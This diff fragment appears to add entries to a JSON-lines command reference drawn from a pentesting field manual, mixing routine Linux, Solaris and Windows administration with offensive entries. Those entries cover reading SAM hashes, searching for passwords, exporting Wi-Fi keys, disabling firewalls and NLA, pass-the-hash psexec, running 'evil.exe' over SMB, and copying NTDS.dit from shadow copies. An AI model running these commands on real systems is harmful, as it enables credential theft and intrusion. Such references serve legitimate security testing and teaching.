| 170 |
+
{"category": "IPTables", "command": "iptables -A OUTPUT -o eth0 -j ACCEPT", "description": "Allow all outbound on eth0"}
|
| 171 |
+
{"category": "IPTables", "command": "iptables -A INPUT -i lo -j ACCEPT", "description": "Allow loopback inbound"}
|
| 172 |
+
{"category": "IPTables", "command": "iptables -A OUTPUT -o lo -j ACCEPT", "description": "Allow loopback outbound"}
|
| 173 |
+
{"category": "IPTables", "command": "iptables -N LOGGING", "description": "Create LOGGING chain"}
|
| 174 |
+
{"category": "IPTables", "command": "iptables -A INPUT -j LOGGING", "description": "Direct INPUT to LOGGING chain"}
|
| 175 |
+
{"category": "IPTables", "command": "iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix \"DROPPED \"", "description": "Log dropped packets (4/min)"}
|
| 176 |
+
{"category": "IPTables", "command": "iptables -A LOGGING -j DROP", "description": "Drop packets in LOGGING chain"}
|
| 177 |
+
{"category": "Update-rc.d", "command": "service --status-all", "description": "List existing services and run status"}
|
| 178 |
+
{"category": "Update-rc.d", "command": "service service start", "description": "Start a service"}
|
| 179 |
+
{"category": "Update-rc.d", "command": "service service stop", "description": "Stop a service"}
|
| 180 |
+
{"category": "Update-rc.d", "command": "service service status", "description": "Check status of a service"}
|
| 181 |
+
{"category": "Update-rc.d", "command": "update-rc.d -f service remove", "description": "Remove a service startup command"}
|
| 182 |
+
{"category": "Update-rc.d", "command": "update-rc.d service defaults", "description": "Add a startup service"}
|
| 183 |
+
{"category": "Chkconfig", "command": "chkconfig --list", "description": "List existing services and run status"}
|
| 184 |
+
{"category": "Chkconfig", "command": "chkconfig service --list", "description": "Check single service status"}
|
| 185 |
+
{"category": "Chkconfig", "command": "chkconfig service on [--level 3]", "description": "Add service (optional run level)"}
|
| 186 |
+
{"category": "Chkconfig", "command": "chkconfig service off [--level 3]", "description": "Remove service (optional run level)"}
|
| 187 |
+
{"category": "Chkconfig", "command": "chkconfig iptables off", "description": "Example: Disable iptables service"}
|
| 188 |
+
{"category": "Screen", "command": "screen -S name", "description": "Start new screen with name"}
|
| 189 |
+
{"category": "Screen", "command": "screen -ls", "description": "List running screens"}
|
| 190 |
+
{"category": "Screen", "command": "screen -r name", "description": "Attach to screen name"}
|
| 191 |
+
{"category": "Screen", "command": "screen -S name -X command", "description": "Send command to screen name"}
|
| 192 |
+
{"category": "Screen", "command": "Ctrl+a ?", "description": "List keybindings (help)"}
|
| 193 |
+
{"category": "Screen", "command": "Ctrl+a d", "description": "Detach"}
|
| 194 |
+
{"category": "Screen", "command": "Ctrl+a D D", "description": "Detach and logout"}
|
| 195 |
+
{"category": "Screen", "command": "Ctrl+a c", "description": "Create new window"}
|
| 196 |
+
{"category": "Screen", "command": "Ctrl+a Ctrl+a", "description": "Switch to last active window"}
|
| 197 |
+
{"category": "Screen", "command": "Ctrl+a ' num|name", "description": "Switch to window num or name"}
|
| 198 |
+
{"category": "Screen", "command": "Ctrl+a \"", "description": "See windows list and change"}
|
| 199 |
+
{"category": "Screen", "command": "Ctrl+a k", "description": "Kill current window"}
|
| 200 |
+
{"category": "Screen", "command": "Ctrl+a S", "description": "Split display horizontally"}
|
| 201 |
+
{"category": "Screen", "command": "Ctrl+a V", "description": "Split display vertically"}
|
| 202 |
+
{"category": "Screen", "command": "Ctrl+a Tab", "description": "Jump to next display"}
|
| 203 |
+
{"category": "Screen", "command": "Ctrl+a X", "description": "Remove current region"}
|
| 204 |
+
{"category": "Screen", "command": "Ctrl+a Q", "description": "Remove all regions but current"}
|
| 205 |
+
{"category": "X11", "command": "xwd -display ip:0 -root -out /tmp/test.xpm", "description": "Capture remote X11 window to XPM"}
|
| 206 |
+
{"category": "X11", "command": "xwud -in /tmp/test.xpm", "description": "Display XPM file"}
|
| 207 |
+
{"category": "X11", "command": "convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg", "description": "Convert XPM to JPG (1280x1024)"}
|
| 208 |
+
{"category": "X11", "command": "xwd -display 1.1.1.1:0 -root -silent -out x11dump", "description": "Capture X11 stream to file"}
|
| 209 |
+
{"category": "X11", "command": "xwudtopnm x11dump", "description": "Read X11 dump with xwudtopnm or GIMP"}
|
| 210 |
+
{"category": "TCPDump", "command": "tcpdump -i eth0 -XX -w out.pcap", "description": "Capture packets on eth0 in ASCII/hex"}
|
| 211 |
+
{"category": "TCPDump", "command": "tcpdump -i eth0 port 80 and dst 2.2.2.2", "description": "Capture HTTP traffic to 2.2.2.2"}
|
| 212 |
+
{"category": "TCPDump", "command": "tcpdump -i eth0 -tttt dst 192.168.1.22 and not net 192.168.1.0/24", "description": "Show connections to specific IP"}
|
| 213 |
+
{"category": "TCPDump", "command": "tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply'", "description": "Print all ping responses"}
|
| 214 |
+
{"category": "TCPDump", "command": "tcpdump -i eth0 -c 50 -tttt 'udp and port 53'", "description": "Capture 50 DNS packets with timestamp"}
|
| 215 |
+
{"category": "Native Kali Commands", "command": "wmis -U DOMAIN\\user%password //DC cmd.exe /c command", "description": "WMIC equivalent to run command"}
|
| 216 |
+
{"category": "Native Kali Commands", "command": "mount.cifs //ip/share /mnt/share -o user=user,pass=pass,sec=ntlmssp,domain=domain,rw", "description": "Mount SMB share to /mnt/share"}
|
| 217 |
+
{"category": "Native Kali Commands", "command": "apt-get update", "description": "Update Kali package lists"}
|
| 218 |
+
{"category": "Native Kali Commands", "command": "apt-get upgrade", "description": "Upgrade Kali packages"}
|
| 219 |
+
{"category": "pfSense", "command": "pfSsh.php", "description": "Access pfSense shell system"}
|
| 220 |
+
{"category": "pfSense", "command": "pfSsh.php playback enableallowallwan", "description": "Allow all inbound WAN connections"}
|
| 221 |
+
{"category": "pfSense", "command": "pfSsh.php playback enablesshd", "description": "Enable SSH inbound/outbound"}
|
| 222 |
+
{"category": "pfSense", "command": "pfctl -sn", "description": "Show NAT rules"}
|
| 223 |
+
{"category": "pfSense", "command": "pfctl -sr", "description": "Show filter rules"}
|
| 224 |
+
{"category": "pfSense", "command": "pfctl -sa", "description": "Show all rules"}
|
| 225 |
+
{"category": "pfSense", "command": "viconfig", "description": "Edit config"}
|
| 226 |
+
{"category": "pfSense", "command": "rm /tmp/config.cache", "description": "Remove cached config after editing"}
|
| 227 |
+
{"category": "pfSense", "command": "/etc/rc.reload_all", "description": "Reload entire config"}
|
| 228 |
+
{"category": "Solaris", "command": "ifconfig -a", "description": "List interfaces"}
|
| 229 |
+
{"category": "Solaris", "command": "netstat -in", "description": "List interface details"}
|
| 230 |
+
{"category": "Solaris", "command": "ifconfig -r", "description": "Show routing table"}
|
| 231 |
+
{"category": "Solaris", "command": "ifconfig eth0 dhcp", "description": "Start DHCP client"}
|
| 232 |
+
{"category": "Solaris", "command": "ifconfig eth0 plumb up ip netmask nmask", "description": "Set IP and netmask"}
|
| 233 |
+
{"category": "Solaris", "command": "route add default ip", "description": "Set default gateway"}
|
| 234 |
+
{"category": "Solaris", "command": "logins -p", "description": "List users without passwords"}
|
| 235 |
+
{"category": "Solaris", "command": "svcs -a", "description": "List all services with status"}
|
| 236 |
+
{"category": "Solaris", "command": "prstat -a", "description": "Process listing (like top)"}
|
| 237 |
+
{"category": "Solaris", "command": "svcadm start ssh", "description": "Start SSH service"}
|
| 238 |
+
{"category": "Solaris", "command": "inetadm -e telnet", "description": "Enable telnet (-d to disable)"}
|
| 239 |
+
{"category": "Solaris", "command": "prtconf | grep Memory", "description": "Show total physical memory"}
|
| 240 |
+
{"category": "Solaris", "command": "iostat -En", "description": "Show hard disk size"}
|
| 241 |
+
{"category": "Solaris", "command": "showrev -c /usr/bin/bash", "description": "Show information on a binary"}
|
| 242 |
+
{"category": "Solaris", "command": "shutdown -i6 -g0 -y", "description": "Restart system"}
|
| 243 |
+
{"category": "Solaris", "command": "dfmounts", "description": "List clients connected to NFS"}
|
| 244 |
+
{"category": "Solaris", "command": "smc", "description": "Management GUI"}
|
| 245 |
+
{"category": "Solaris", "command": "snoop -d int -c pkt", "description": "Packet capture (-o results.pcap to save)"}
|
| 246 |
+
{"category": "Solaris", "command": "/etc/vfstab", "description": "File system mount table"}
|
| 247 |
+
{"category": "Solaris", "command": "/var/adm/loginlog", "description": "Login attempt log"}
|
| 248 |
+
{"category": "Solaris", "command": "/etc/default/*", "description": "Default settings"}
|
| 249 |
+
{"category": "Solaris", "command": "/etc/system", "description": "Kernel modules and config"}
|
| 250 |
+
{"category": "Solaris", "command": "/var/adm/messages", "description": "Syslog location"}
|
| 251 |
+
{"category": "Solaris", "command": "/etc/auto_*", "description": "Automounter config files"}
|
| 252 |
+
{"category": "Solaris", "command": "/etc/inet/ipnodes", "description": "IPv4/IPv6 host files"}
|
| 253 |
+
{"category": "Windows Versions", "command": "Windows NT 3.1", "description": "All editions"}
|
| 254 |
+
{"category": "Windows Versions", "command": "Windows NT 3.5", "description": "All editions"}
|
| 255 |
+
{"category": "Windows Versions", "command": "Windows NT 3.51", "description": "All editions"}
|
| 256 |
+
{"category": "Windows Versions", "command": "Windows NT 4.0", "description": "All editions"}
|
| 257 |
+
{"category": "Windows Versions", "command": "Windows 2000", "description": "All editions (NT 5.0)"}
|
| 258 |
+
{"category": "Windows Versions", "command": "Windows XP", "description": "Home, Pro, MC, Tablet PC, Starter, Embedded (NT 5.1)"}
|
| 259 |
+
{"category": "Windows Versions", "command": "Windows XP 64-bit", "description": "64-bit, Pro 64-bit (NT 5.1)"}
|
| 260 |
+
{"category": "Windows Versions", "command": "Windows Server 2003", "description": "Standard, Enterprise (NT 5.2)"}
|
| 261 |
+
{"category": "Windows Versions", "command": "Windows Server 2003 R2", "description": "Standard, Enterprise (NT 5.2)"}
|
| 262 |
+
{"category": "Windows Versions", "command": "Windows Home Server", "description": "Home Server edition (NT 5.2)"}
|
| 263 |
+
{"category": "Windows Versions", "command": "Windows Vista", "description": "Starter, Home, Basic, Premium, Business, Enterprise, Ultimate (NT 6.0)"}
|
| 264 |
+
{"category": "Windows Versions", "command": "Windows Server 2008", "description": "Foundation, Standard, Enterprise (NT 6.0)"}
|
| 265 |
+
{"category": "Windows Versions", "command": "Windows 7", "description": "Starter, Home, Pro, Enterprise, Ultimate (NT 6.1)"}
|
| 266 |
+
{"category": "Windows Versions", "command": "Windows Server 2008 R2", "description": "Foundation, Standard, Enterprise (NT 6.1)"}
|
| 267 |
+
{"category": "Windows Versions", "command": "Windows 8", "description": "x86/64, Pro, Enterprise, RT (ARM) (NT 6.2)"}
|
| 268 |
+
{"category": "Windows Versions", "command": "Windows Phone 8", "description": "Mobile OS (NT 6.2)"}
|
| 269 |
+
{"category": "Windows Versions", "command": "Windows Server 2012", "description": "Foundation, Essentials, Standard (NT 6.2)"}
|
| 270 |
+
{"category": "Windows Versions", "command": "Windows 8.1", "description": "x86/64, Pro, Enterprise (NT 6.3)"}
|
| 271 |
+
{"category": "Windows Versions", "command": "Windows Server 2012 R2", "description": "Foundation, Essentials, Standard (NT 6.3)"}
|
| 272 |
+
{"category": "Windows Versions", "command": "Windows 10", "description": "Home, Pro, Enterprise, Education, IoT (NT 10.0)"}
|
| 273 |
+
{"category": "Windows Versions", "command": "Windows Server 2016", "description": "Standard, Datacenter, Essentials (NT 10.0)"}
|
| 274 |
+
{"category": "Windows Versions", "command": "Windows Server 2019", "description": "Standard, Datacenter, Essentials (NT 10.0)"}
|
| 275 |
+
{"category": "Windows Versions", "command": "Windows 11", "description": "Home, Pro, Enterprise, Education (NT 10.0)"}
|
| 276 |
+
{"category": "Windows Versions", "command": "Windows Server 2022", "description": "Standard, Datacenter, Essentials (NT 10.0)"}
|
| 277 |
+
{"category": "Windows Files", "command": "%SYSTEMROOT%", "description": "Typically C:\\Windows"}
|
| 278 |
+
{"category": "Windows Files", "command": "%SYSTEMROOT%\\System32\\drivers\\etc\\hosts", "description": "DNS entries"}
|
| 279 |
+
{"category": "Windows Files", "command": "%SYSTEMROOT%\\System32\\drivers\\etc\\networks", "description": "Network settings"}
|
| 280 |
+
{"category": "Windows Files", "command": "%SYSTEMROOT%\\System32\\config\\SAM", "description": "User & password hashes"}
|
| 281 |
+
{"category": "Windows Files", "command": "%SYSTEMROOT%\\repair\\SAM", "description": "Backup copy of SAM"}
|
| 282 |
+
{"category": "Windows Files", "command": "%SYSTEMROOT%\\System32\\config\\RegBack\\SAM", "description": "Backup copy of SAM"}
|
| 283 |
+
{"category": "Windows Files", "command": "%WINDIR%\\System32\\config\\AppEvent.Evt", "description": "Application Log"}
|
| 284 |
+
{"category": "Windows Files", "command": "%WINDIR%\\System32\\config\\SecEvent.Evt", "description": "Security Log"}
|
| 285 |
+
{"category": "Windows Files", "command": "%ALLUSERSPROFILE%\\Start Menu\\Programs\\Startup", "description": "Startup Location (all users)"}
|
| 286 |
+
{"category": "Windows Files", "command": "%USERPROFILE%\\Start Menu\\Programs\\Startup", "description": "Startup Location (specific user)"}
|
| 287 |
+
{"category": "Windows Files", "command": "%SYSTEMROOT%\\Prefetch", "description": "Prefetch dir (EXE logs)"}
|
| 288 |
+
{"category": "Startup Directories", "command": "%SystemDrive%\\Windows\\Start Menu\\Programs\\Startup", "description": "Windows 9x startup (all users)"}
|
| 289 |
+
{"category": "Startup Directories", "command": "%SystemDrive%\\WINNT\\Profiles\\All Users\\Start Menu\\Programs\\Startup", "description": "Windows NT 4.0, 3.51, 3.50 startup (all users)"}
|
| 290 |
+
{"category": "Startup Directories", "command": "%SystemDrive%\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", "description": "Windows NT 6.1, 6.0 startup (all users)"}
|
| 291 |
+
{"category": "Startup Directories", "command": "%SystemDrive%\\Users\\%UserName%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", "description": "Windows NT 6.1, 6.0 startup (specific users)"}
|
| 292 |
+
{"category": "Startup Directories", "command": "%SystemDrive%\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup", "description": "Windows NT 5.2, 5.1, 5.0 startup (all users)"}
|
| 293 |
+
{"category": "Windows System Info Commands", "command": "ver", "description": "Get OS version"}
|
| 294 |
+
{"category": "Windows System Info Commands", "command": "sc query state=all", "description": "Show services"}
|
| 295 |
+
{"category": "Windows System Info Commands", "command": "tasklist /svc", "description": "Show processes & services"}
|
| 296 |
+
{"category": "Windows System Info Commands", "command": "tasklist /m", "description": "Show all processes & DLLs"}
|
| 297 |
+
{"category": "Windows System Info Commands", "command": "tasklist /S ip /v", "description": "Remote process listing"}
|
| 298 |
+
{"category": "Windows System Info Commands", "command": "taskkill /PID pid /F", "description": "Force process to terminate"}
|
| 299 |
+
{"category": "Windows System Info Commands", "command": "systeminfo /S ip /U domain\\user /P pwd", "description": "Remote system info"}
|
| 300 |
+
{"category": "Windows System Info Commands", "command": "reg query \\\\ip\\RegistryKey\\Key /v Value", "description": "Query remote registry"}
|
| 301 |
+
{"category": "Windows System Info Commands", "command": "reg query HKLM /f password /t REG_SZ /s", "description": "Search registry for password"}
|
| 302 |
+
{"category": "Windows System Info Commands", "command": "fsutil fsinfo drives", "description": "List drives (must be admin)"}
|
| 303 |
+
{"category": "Windows System Info Commands", "command": "dir /a /s /b c:\\*.pdf", "description": "Search for all PDFs"}
|
| 304 |
+
{"category": "Windows System Info Commands", "command": "dir /a /b c:\\windows\\kb*", "description": "Search for patches"}
|
| 305 |
+
{"category": "Windows System Info Commands", "command": "findstr /si password *.txt *.xml *.xls", "description": "Search files for password"}
|
| 306 |
+
{"category": "Windows System Info Commands", "command": "tree /F /A c:\\ > tree.txt", "description": "Directory listing of C:"}
|
| 307 |
+
{"category": "Windows System Info Commands", "command": "reg save HKLM\\Security security.hive", "description": "Save security hive to file"}
|
| 308 |
+
{"category": "Windows System Info Commands", "command": "echo %USERNAME%", "description": "Current user"}
|
| 309 |
+
{"category": "Windows Net/Domain Commands", "command": "net view /domain", "description": "Hosts in current domain"}
|
| 310 |
+
{"category": "Windows Net/Domain Commands", "command": "net view /domain:MYDOMAIN", "description": "Hosts in MYDOMAIN"}
|
| 311 |
+
{"category": "Windows Net/Domain Commands", "command": "net user /domain", "description": "All users in current domain"}
|
| 312 |
+
{"category": "Windows Net/Domain Commands", "command": "net user user pass /add", "description": "Add user"}
|
| 313 |
+
{"category": "Windows Net/Domain Commands", "command": "net localgroup \"Administrators\" user /add", "description": "Add user to Administrators"}
|
| 314 |
+
{"category": "Windows Net/Domain Commands", "command": "net accounts /domain", "description": "Domain password policy"}
|
| 315 |
+
{"category": "Windows Net/Domain Commands", "command": "net localgroup \"Administrators\"", "description": "List local Admins"}
|
| 316 |
+
{"category": "Windows Net/Domain Commands", "command": "net group /domain", "description": "List domain groups"}
|
| 317 |
+
{"category": "Windows Net/Domain Commands", "command": "net group \"Domain Admins\" /domain", "description": "List users in Domain Admins"}
|
| 318 |
+
{"category": "Windows Net/Domain Commands", "command": "net group \"Domain Controllers\" /domain", "description": "List DCs for current domain"}
|
| 319 |
+
{"category": "Windows Net/Domain Commands", "command": "net share", "description": "Current SMB shares"}
|
| 320 |
+
{"category": "Windows Net/Domain Commands", "command": "net session | find \"\\\\\"", "description": "Active SMB sessions"}
|
| 321 |
+
{"category": "Windows Net/Domain Commands", "command": "net user user /ACTIVE:yes /domain", "description": "Unlock domain user account"}
|
| 322 |
+
{"category": "Windows Net/Domain Commands", "command": "net user user newpassword /domain", "description": "Change domain user password"}
|
| 323 |
+
{"category": "Windows Net/Domain Commands", "command": "net share share c:\\share /GRANT:Everyone,FULL", "description": "Share folder"}
|
| 324 |
+
{"category": "Windows Remote Commands", "command": "tasklist /S ip /v", "description": "Remote process listing"}
|
| 325 |
+
{"category": "Windows Remote Commands", "command": "systeminfo /S ip /U domain\\user /P pwd", "description": "Remote system info"}
|
| 326 |
+
{"category": "Windows Remote Commands", "command": "net share \\\\ip", "description": "Shares of remote computer"}
|
| 327 |
+
{"category": "Windows Remote Commands", "command": "net use \\\\ip", "description": "Remote filesystem (IPC$)"}
|
| 328 |
+
{"category": "Windows Remote Commands", "command": "net use z: \\\\ip\\share password /user:DOMAIN\\user", "description": "Map drive with specified credentials"}
|
| 329 |
+
{"category": "Windows Remote Commands", "command": "reg add \\\\ip\\regkey\\value", "description": "Add registry key remotely"}
|
| 330 |
+
{"category": "Windows Remote Commands", "command": "sc \\\\ip create service binpath=C:\\Windows\\System32\\x.exe start=auto", "description": "Create a remote service (space after start=)"}
|
| 331 |
+
{"category": "Windows Remote Commands", "command": "xcopy /s \\\\ip\\dir C:\\local", "description": "Copy remote folder"}
|
| 332 |
+
{"category": "Windows Remote Commands", "command": "shutdown /m \\\\ip /r /t 0 /f", "description": "Remotely reboot machine"}
|
| 333 |
+
{"category": "Windows Network Commands", "command": "ipconfig /all", "description": "IP configuration"}
|
| 334 |
+
{"category": "Windows Network Commands", "command": "ipconfig /displaydns", "description": "Local DNS cache"}
|
| 335 |
+
{"category": "Windows Network Commands", "command": "netstat -ana", "description": "Open connections"}
|
| 336 |
+
{"category": "Windows Network Commands", "command": "netstat -anop tcp", "description": "Netstat loop"}
|
| 337 |
+
{"category": "Windows Network Commands", "command": "netstat -ano | findstr LISTENING", "description": "LISTENING ports"}
|
| 338 |
+
{"category": "Windows Network Commands", "command": "route print", "description": "Routing table"}
|
| 339 |
+
{"category": "Windows Network Commands", "command": "arp -a", "description": "Known MACs (ARP table)"}
|
| 340 |
+
{"category": "Windows Network Commands", "command": "nslookup set type=any ls -d domain > results.txt exit", "description": "DNS Zone Xfer"}
|
| 341 |
+
{"category": "Windows Network Commands", "command": "nslookup -type=SRV _www._tcp.url.com", "description": "Domain SRV lookup (ldap, kerberos, sip)"}
|
| 342 |
+
{"category": "Windows Network Commands", "command": "tftp -i ip GET remotefile", "description": "TFTP file transfer"}
|
| 343 |
+
{"category": "Windows Network Commands", "command": "netsh wlan show profiles", "description": "Saved wireless profiles"}
|
| 344 |
+
{"category": "Windows Network Commands", "command": "netsh firewall set opmode disable", "description": "Disable firewall (Old)"}
|
| 345 |
+
{"category": "Windows Network Commands", "command": "netsh wlan export profile folder=. key=clear", "description": "Export wifi plaintext password"}
|
| 346 |
+
{"category": "Windows Network Commands", "command": "netsh interface ip show interfaces", "description": "List interface IDs/MTUs"}
|
| 347 |
+
{"category": "Windows Network Commands", "command": "netsh interface ip set address local static ip nmask gw ID", "description": "Set IP"}
|
| 348 |
+
{"category": "Windows Network Commands", "command": "netsh interface ip set dns local static ip", "description": "Set DNS server"}
|
| 349 |
+
{"category": "Windows Network Commands", "command": "netsh interface ip set address local dhcp", "description": "Set interface to use DHCP"}
|
| 350 |
+
{"category": "Windows Utility Commands", "command": "type file", "description": "Display file contents"}
|
| 351 |
+
{"category": "Windows Utility Commands", "command": "del path\\*.* /a /s /q /f", "description": "Forcibly delete all files in path"}
|
| 352 |
+
{"category": "Windows Utility Commands", "command": "find /I \"str\" filename", "description": "Find \"str\" in file"}
|
| 353 |
+
{"category": "Windows Utility Commands", "command": "command | find /c /v \"\"", "description": "Line count of command output"}
|
| 354 |
+
{"category": "Windows Utility Commands", "command": "at HH:MM file [args]", "description": "Schedule file to run (e.g., at 14:45 cmd /c)"}
|
| 355 |
+
{"category": "Windows Utility Commands", "command": "runas /user:user \"file [args]\"", "description": "Run file as user"}
|
| 356 |
+
{"category": "Windows Utility Commands", "command": "shutdown /r /t 0", "description": "Restart now"}
|
| 357 |
+
{"category": "Windows Utility Commands", "command": "tr -d '\\15\\32' win.txt > unix.txt", "description": "Removes CR & LF (Unix conversion)"}
|
| 358 |
+
{"category": "Windows Utility Commands", "command": "makecab file", "description": "Native compression"}
|
| 359 |
+
{"category": "Windows Utility Commands", "command": "wusa.exe /uninstall /kb:###", "description": "Uninstall patch"}
|
| 360 |
+
{"category": "Windows Utility Commands", "command": "cmd.exe \"wevtutil qe Application /c:40 /f:text /rd:true\"", "description": "CLI Event Viewer"}
|
| 361 |
+
{"category": "Windows Utility Commands", "command": "lusrmgr.msc", "description": "Local user manager"}
|
| 362 |
+
{"category": "Windows Utility Commands", "command": "services.msc", "description": "Services control panel"}
|
| 363 |
+
{"category": "Windows Utility Commands", "command": "taskmgr.exe", "description": "Task manager"}
|
| 364 |
+
{"category": "Windows Utility Commands", "command": "secpol.msc", "description": "Security policy manager"}
|
| 365 |
+
{"category": "Windows Utility Commands", "command": "eventvwr.msc", "description": "Event viewer"}
|
| 366 |
+
{"category": "Misc. Commands", "command": "rundll32.dll user32.dll LockWorkstation", "description": "Lock workstation"}
|
| 367 |
+
{"category": "Misc. Commands", "command": "netsh advfirewall set currentprofile state off", "description": "Disable Windows firewall (current profile)"}
|
| 368 |
+
{"category": "Misc. Commands", "command": "netsh advfirewall set allprofiles state off", "description": "Disable Windows firewall (all profiles)"}
|
| 369 |
+
{"category": "Misc. Commands", "command": "netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2", "description": "Native Windows port forward (must be admin)"}
|
| 370 |
+
{"category": "Misc. Commands", "command": "netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1", "description": "Remove port forward"}
|
| 371 |
+
{"category": "Misc. Commands", "command": "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\System /v DisableCMD /t REG_DWORD /d 0 /f", "description": "Re-enable command prompt"}
|
| 372 |
+
{"category": "Misc. Commands", "command": "psexec /accepteula \\\\targetIP -u domain\\user -p password -c -f \\\\smbIP\\share\\file.exe", "description": "Execute file hosted on remote system with credentials"}
|
| 373 |
+
{"category": "Misc. Commands", "command": "psexec /accepteula \\\\ip -u Domain\\user -p NTLM_hash cmd.exe /c c:\\ProgramData\\command", "description": "Run remote command with specified hash"}
|
| 374 |
+
{"category": "Misc. Commands", "command": "psexec /accepteula \\\\ip -s cmd.exe", "description": "Run remote command as SYSTEM"}
|
| 375 |
+
{"category": "Terminal Services (RDP)", "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f", "description": "Enable RDP"}
|
| 376 |
+
{"category": "Terminal Services (RDP)", "command": "net start termservice", "description": "Start Terminal Services"}
|
| 377 |
+
{"category": "Terminal Services (RDP)", "command": "sc config termservice start=auto", "description": "Set Terminal Services to start automatically"}
|
| 378 |
+
{"category": "Terminal Services (RDP)", "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 443 /f", "description": "Tunnel RDP out port 443 (may need restart)"}
|
| 379 |
+
{"category": "Terminal Services (RDP)", "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f", "description": "Disable Network Level Authentication"}
|
| 380 |
+
{"category": "Terminal Services (RDP)", "command": "netsh firewall set service type=remotedesktop mode=enable", "description": "Add firewall exception for RDP"}
|
| 381 |
+
{"category": "Terminal Services (RDP)", "command": "schtasks.exe /create /tn MyTask /xml \"C:\\MyTask.xml\" /f", "description": "Import a schedule task from XML"}
|
| 382 |
+
{"category": "WMIC", "command": "wmic [alias] get /?", "description": "List all attributes"}
|
| 383 |
+
{"category": "WMIC", "command": "wmic [alias] call /?", "description": "List callable methods"}
|
| 384 |
+
{"category": "WMIC", "command": "wmic process list full", "description": "Process attributes"}
|
| 385 |
+
{"category": "WMIC", "command": "wmic startup", "description": "List startup services"}
|
| 386 |
+
{"category": "WMIC", "command": "wmic service", "description": "List services"}
|
| 387 |
+
{"category": "WMIC", "command": "wmic ntdomain list", "description": "Domain and DC info"}
|
| 388 |
+
{"category": "WMIC", "command": "wmic qfe", "description": "List all patches"}
|
| 389 |
+
{"category": "WMIC", "command": "wmic process call create \"process_name\"", "description": "Execute process"}
|
| 390 |
+
{"category": "WMIC", "command": "wmic process where name=\"process\" call terminate", "description": "Terminate process"}
|
| 391 |
+
{"category": "WMIC", "command": "wmic logicaldisk get description,name", "description": "View logical shares"}
|
| 392 |
+
{"category": "WMIC", "command": "wmic cpu get DataWidth /format:list", "description": "Display 32 or 64 bit"}
|
| 393 |
+
{"category": "WMIC", "command": "wmic /node:targetIP /user:domain\\user /password:password process call create \"\\\\smbIP\\share\\evil.exe\"", "description": "Execute file hosted over SMB with credentials"}
|
| 394 |
+
{"category": "WMIC", "command": "wmic product get name /value", "description": "Get software names"}
|
| 395 |
+
{"category": "WMIC", "command": "wmic product where name=\"XXX\" call uninstall /nointeractive", "description": "Uninstall software"}
|
| 396 |
+
{"category": "WMIC", "command": "wmic /node:remotecomputer computersystem get username", "description": "Remotely determine logged-in user"}
|
| 397 |
+
{"category": "WMIC", "command": "wmic /node:machinename process list brief /every:1", "description": "Remote process listing every second"}
|
| 398 |
+
{"category": "WMIC", "command": "wmic /node:\"machinename\" path Win32_TerminalServiceSetting where AllowTSConnections=\"0\" call SetAllowTSConnections \"1\"", "description": "Remotely start RDP"}
|
| 399 |
+
{"category": "WMIC", "command": "wmic netlogin where (name like \"%adm%\") get numberoflogons", "description": "List number of times user has logged on"}
|
| 400 |
+
{"category": "WMIC", "command": "wmic service get name,displayname,pathname,startmode | findstr /i auto | findstr /i /v \"C:\\windows\\\\\" | findstr /i /v \"\"\"", "description": "Search for services with unquoted paths"}
|
| 401 |
+
{"category": "Volume Shadow Copy", "command": "wmic /node:DC_IP /user:\"DOMAIN\\user\" /password:\"PASS\" process call create \"cmd /c vssadmin list shadows 2>&1 c:\\temp\\output.txt\"", "description": "List shadow copies and check for existing copies"}
|
| 402 |
+
{"category": "Volume Shadow Copy", "command": "wmic /node:DC_IP /user:\"DOMAIN\\user\" /password:\"PASS\" process call create \"cmd /c vssadmin create shadow /for=C: 2>&1 C:\\temp\\output.txt\"", "description": "Create shadow copy for C: drive"}
|
| 403 |
+
{"category": "Volume Shadow Copy", "command": "wmic /node:DC_IP /user:\"DOMAIN\\user\" /password:\"PASS\" process call create \"cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\temp\\system.hive 2>&1 C:\\temp\\output.txt\"", "description": "Copy SYSTEM hive from shadow copy"}
|
| 404 |
+
{"category": "Volume Shadow Copy", "command": "wmic /node:DC_IP /user:\"DOMAIN\\user\" /password:\"PASS\" process call create \"cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\NTDS\\NTDS.dit C:\\temp\\ntds.dit 2>&1 C:\\temp\\output.txt\"", "description": "Copy NTDS.dit from shadow copy"}
|
| 405 |
+
{"category": "Volume Shadow Copy", "command": "From Linux, download and run ntdsxtract and libesedb to export hashes or other domain information", "description": "Extract domain info using ntdsxtract and libesedb"}
|
| 406 |
+
{"category": "PowerShell", "command": "Get-Content file", "description": "Displays file contents"}
|
| 407 |
+
{"category": "PowerShell", "command": "Get-Help command -Examples", "description": "Shows examples of command"}
|
| 408 |
+
{"category": "PowerShell", "command": "Get-Command *string*", "description": "Searches for command string"}
|
| 409 |
+
{"category": "PowerShell", "command": "Get-Service", "description": "Displays services (use Stop-Service, Start-Service)"}
|
| 410 |
+
{"category": "PowerShell", "command": "Get-WmiObject -Class Win32_Service", "description": "Displays services, supports alternate credentials"}
|
| 411 |
+
{"category": "PowerShell", "command": "$PSVersionTable", "description": "Displays PowerShell version"}
|
| 412 |
+
{"category": "PowerShell", "command": "powershell.exe -Version 2.0", "description": "Run PowerShell 2.0 from 3.0"}
|
| 413 |
+
{"category": "PowerShell", "command": "Get-Service | Measure-Object", "description": "Returns number of services"}
|
| 414 |
+
{"category": "PowerShell", "command": "Get-PSDrive", "description": "Returns list of PSDrives"}
|
| 415 |
+
